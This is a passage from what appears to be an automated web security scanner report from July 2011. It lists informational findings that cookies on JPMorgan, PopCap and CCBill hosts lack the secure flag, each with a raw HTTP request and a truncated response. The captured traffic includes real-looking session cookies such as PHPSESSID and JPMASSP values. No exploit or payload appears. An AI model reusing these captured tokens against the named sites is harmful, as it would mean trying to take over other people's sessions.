Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:49 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"7809-1310119356000"
Last-Modified: Fri, 08 Jul 2011 10:02:36 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:49 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 7809
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/javascript

/*
Copyright (c) 2010, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.com/yui/license.html
version: 2.8.1
*/
(function(){var A=YAHOO.util;A.Selector
...[SNIP]...

7.92. https://mm.jpmorgan.com/js/yui/tabview-min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mm.jpmorgan.com
Path:   /js/yui/tabview-min.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/yui/tabview-min.js HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:54 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"9929-1310119356000"
Last-Modified: Fri, 08 Jul 2011 10:02:36 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:54 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 9929
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/javascript

/*
Copyright (c) 2009, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.net/yui/license.txt
version: 2.8.0r4
*/
(function(){var B=YAHOO.util,C=B.Dom,H=B.Eve
...[SNIP]...

7.93. https://mm.jpmorgan.com/js/yui/treeview-min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mm.jpmorgan.com
Path:   /js/yui/treeview-min.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/yui/treeview-min.js HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:54 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"34319-1310119356000"
Last-Modified: Fri, 08 Jul 2011 10:02:36 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:54 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 34319
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/javascript

/*
Copyright (c) 2010, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.com/yui/license.html
version: 2.8.1
*/
(function(){var D=YAHOO.util.Dom,B=YAHO
...[SNIP]...

7.94. https://mm.jpmorgan.com/js/yui/yahoo-dom-event.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mm.jpmorgan.com
Path:   /js/yui/yahoo-dom-event.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/yui/yahoo-dom-event.js HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:49 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"37005-1310119356000"
Last-Modified: Fri, 08 Jul 2011 10:02:36 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:49 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 37005
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/javascript

/*
Copyright (c) 2009, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.net/yui/license.txt
version: 2.8.0r4
*/
if(typeof YAHOO=="undefined"||!YAHOO){
...[SNIP]...

7.95. https://store.popcap.com/payment.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://store.popcap.com
Path:   /payment.php

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /payment.php HTTP/1.1
Host: store.popcap.com
Connection: keep-alive
Referer: https://store.popcap.com/cart.php?a=track_a&oid=11464&installtag=&icid=bwbundle_HP_PLARGE_pc_EN
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user_id=461b1f76-758a-4ffe-87df-c12b77a2c13c; lcid=1033; geo_location=US; demographics=000000000000000; cookie_version=5; s_vnum=1312174800889%26vn%3D1; s_fv=flash%2010; __utma=163442877.1858697665.1310503156.1310503156.1310503156.1; __utmc=163442877; __utmz=163442877.1310503156.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-1840915809-1310503155904; s_vi=[CS]v1|270E587F051D3BC7-60000103000EBB3F[CE]; PHPSESSID=82rvc45ec9c02afcbeu2lourh7; __utmb=163442877; lv=1310503702; user_profile=003000000000000; s_cc=true; s_invisit=true; s_sq=popcapcom%3D%2526pid%253DCommerce%252520%25253E%252520Cart%2526pidt%253D1%2526oid%253Dhttps%25253A//store.popcap.com/payment.php%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 20:48:32 GMT
Server: Apache
Set-Cookie: nickname=deleted; expires=Mon, 12-Jul-2010 20:48:31 GMT; path=/; domain=.popcap.com
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: user_profile=003000000000000; expires=Fri, 06-Jul-2012 20:48:32 GMT; path=/; domain=.popcap.com
Set-Cookie: user_profile=003000000000000; expires=Fri, 06-Jul-2012 20:48:32 GMT; path=/; domain=.popcap.com
Set-Cookie: user_profile=003000000000000; expires=Fri, 06-Jul-2012 20:48:32 GMT; path=/; domain=.popcap.com
Set-Cookie: user_profile=003000000000000; expires=Fri, 06-Jul-2012 20:48:32 GMT; path=/; domain=.popcap.com
Set-Cookie: user_profile=003000000000000; expires=Fri, 06-Jul-2012 20:48:32 GMT; path=/; domain=.popcap.com
Set-Cookie: user_profile=003000000000000; expires=Fri, 06-Jul-2012 20:48:32 GMT; path=/; domain=.popcap.com
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 49903

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>PopCap Games -
...[SNIP]...

7.96. https://support.ccbill.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.ccbill.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: support.ccbill.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.5.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:14:16 GMT
X-Cnection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7; Path=/
Content-Length: 13895

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>CCBill Credit Ca
...[SNIP]...

7.97. https://support.ccbill.com/js/ga.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.ccbill.com
Path:   /js/ga.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/ga.js HTTP/1.1
Host: support.ccbill.com
Connection: keep-alive
Referer: https://support.ccbill.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.5.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:14:21 GMT
Last-Modified: Thu, 11 Nov 2010 21:01:58 GMT
ETag: "1834f1-6230-494cd48d57d80"
Accept-Ranges: bytes
Content-Length: 25136
X-Cnection: close
Content-Type: application/x-javascript
X-Pad: avoid browser bug
Set-Cookie: TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7; Path=/

(function(){var aa="_gat",ba="_gaq",r=true,v=false,w=undefined,ca=document,da="4.7.2",y="length",z="cookie",A="location",ea="_gaUserPrefs",fa="ioo",B="&",C="=",D="__utma=",F="__utmb=",G="__utmc=",ga="
...[SNIP]...

7.98. https://support.ccbill.com/style/css/base.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.ccbill.com
Path:   /style/css/base.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/css/base.css HTTP/1.1
Host: support.ccbill.com
Connection: keep-alive
Referer: https://support.ccbill.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.5.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:14:19 GMT
Last-Modified: Wed, 08 Sep 2010 19:05:55 GMT
ETag: "286bc1-3cf4-48fc433f68ac0"
Accept-Ranges: bytes
Content-Length: 15604
X-Cnection: close
Content-Type: text/css
Set-Cookie: TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7; Path=/

/* Lavidge Base HTML/CSS - Written By: Eric Florez - Last Updated: 2010-07-06 */
/* ====================== Page Formatting ======================== */
* {
   margin:0;
   padding:0;
   font-family:Verd
...[SNIP]...

7.99. https://support.ccbill.com/style/css/consumers.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.ccbill.com
Path:   /style/css/consumers.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/css/consumers.css HTTP/1.1
Host: support.ccbill.com
Connection: keep-alive
Referer: https://support.ccbill.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.5.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:14:17 GMT
Last-Modified: Wed, 08 Sep 2010 20:06:02 GMT
ETag: "33a641-1180-48fc50af4fe80"
Accept-Ranges: bytes
Content-Length: 4480
X-Cnection: close
Content-Type: text/css
Set-Cookie: TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7; Path=/

@import url(base.css);
/* ====================== Page Formatting ======================== */
ul.list_arrow li, #left_nav li.current_page {background-image:url(../img/icons/bullet_arrow_light_blue.gif)
...[SNIP]...

7.100. https://support.ccbill.com/style/img/background/body.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.ccbill.com
Path:   /style/img/background/body.png

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/img/background/body.png HTTP/1.1
Host: support.ccbill.com
Connection: keep-alive
Referer: https://support.ccbill.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.5.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:14:21 GMT
Last-Modified: Wed, 08 Sep 2010 18:58:17 GMT
ETag: "2cea04-11b-48fc418aa0440"
Accept-Ranges: bytes
Content-Length: 283
X-Cnection: close
Content-Type: image/png
Set-Cookie: TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7; Path=/

.PNG
.
...IHDR.......h......G.....-PLTE.............................................e.".....IDATx^...    .1.... 6.....mA...!...6..i...+H..`...............%..j..%].&..;^./.v.>=    9.........sP........b..
...[SNIP]...

7.101. https://support.ccbill.com/style/img/background/body_container.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.ccbill.com
Path:   /style/img/background/body_container.png

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/img/background/body_container.png HTTP/1.1
Host: support.ccbill.com
Connection: keep-alive
Referer: https://support.ccbill.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.5.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:14:21 GMT
Last-Modified: Wed, 08 Sep 2010 18:58:17 GMT
ETag: "1674f1-362a-48fc418aa0440"
Accept-Ranges: bytes
Content-Length: 13866
X-Cnection: close
Content-Type: image/png
Set-Cookie: TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7; Path=/

.PNG
.
...IHDR...d.................PLTE...................................................................................................................................|...5dIDATx^...z#I.....F...{
...[SNIP]...

7.102. https://support.ccbill.com/style/img/background/main.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.ccbill.com
Path:   /style/img/background/main.png

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/img/background/main.png HTTP/1.1
Host: support.ccbill.com
Connection: keep-alive
Referer: https://support.ccbill.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.5.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:14:21 GMT
Last-Modified: Wed, 08 Sep 2010 18:58:17 GMT
ETag: "33a652-79d-48fc418aa0440"
Accept-Ranges: bytes
Content-Length: 1949
X-Cnection: close
Content-Type: image/png
Set-Cookie: TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7; Path=/

.PNG
.
...IHDR.......d.....".......PLTE...................................................................................................................................>.....IDATx^...n...@..90g*..
...[SNIP]...

7.103. https://support.ccbill.com/style/img/buttons/btn_search.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.ccbill.com
Path:   /style/img/buttons/btn_search.png

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/img/buttons/btn_search.png HTTP/1.1
Host: support.ccbill.com
Connection: keep-alive
Referer: https://support.ccbill.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.5.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:14:22 GMT
Last-Modified: Wed, 08 Sep 2010 19:00:02 GMT
ETag: "2de9e6-b45-48fc41eec3080"
Accept-Ranges: bytes
Content-Length: 2885
Keep-Alive: timeout=60, max=60
Connection: Keep-Alive
Content-Type: image/png
Set-Cookie: TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7; Path=/

.PNG
.
...IHDR...i...".....k.......tEXtSoftware.Adobe ImageReadyq.e<... iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

7.104. https://support.ccbill.com/style/img/icons/bullet_square_blk.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.ccbill.com
Path:   /style/img/icons/bullet_square_blk.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/img/icons/bullet_square_blk.gif HTTP/1.1
Host: support.ccbill.com
Connection: keep-alive
Referer: https://support.ccbill.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.5.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:14:21 GMT
Last-Modified: Wed, 08 Sep 2010 19:01:46 GMT
ETag: "16756d-2e-48fc4251f1a80"
Accept-Ranges: bytes
Content-Length: 46
X-Cnection: close
Content-Type: image/gif
Set-Cookie: TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7; Path=/

GIF89a.............!.......,.................;

7.105. https://support.ccbill.com/style/img/sprites/page_elements.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.ccbill.com
Path:   /style/img/sprites/page_elements.png

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/img/sprites/page_elements.png HTTP/1.1
Host: support.ccbill.com
Connection: keep-alive
Referer: https://support.ccbill.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.5.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:14:23 GMT
Last-Modified: Wed, 08 Sep 2010 19:03:23 GMT
ETag: "13c85c-2b19-48fc42ae734c0"
Accept-Ranges: bytes
Content-Length: 11033
X-Cnection: close
Content-Type: image/png
Set-Cookie: TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7; Path=/

.PNG
.
...IHDR.."6...R.....Py......PLTE).....................................................<^..........................y.................................(........).........................UV....t
...[SNIP]...

